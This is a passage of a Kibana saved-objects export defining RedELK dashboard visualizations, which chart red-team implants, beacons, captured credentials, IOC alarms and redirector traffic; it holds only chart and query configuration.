"e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 123], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 125], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 127], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 128], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 130], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 135], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 137], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 139], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 141], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 143], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 145], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 147], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 149], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 151], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 154], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 156], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 158], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 160], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 162], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": 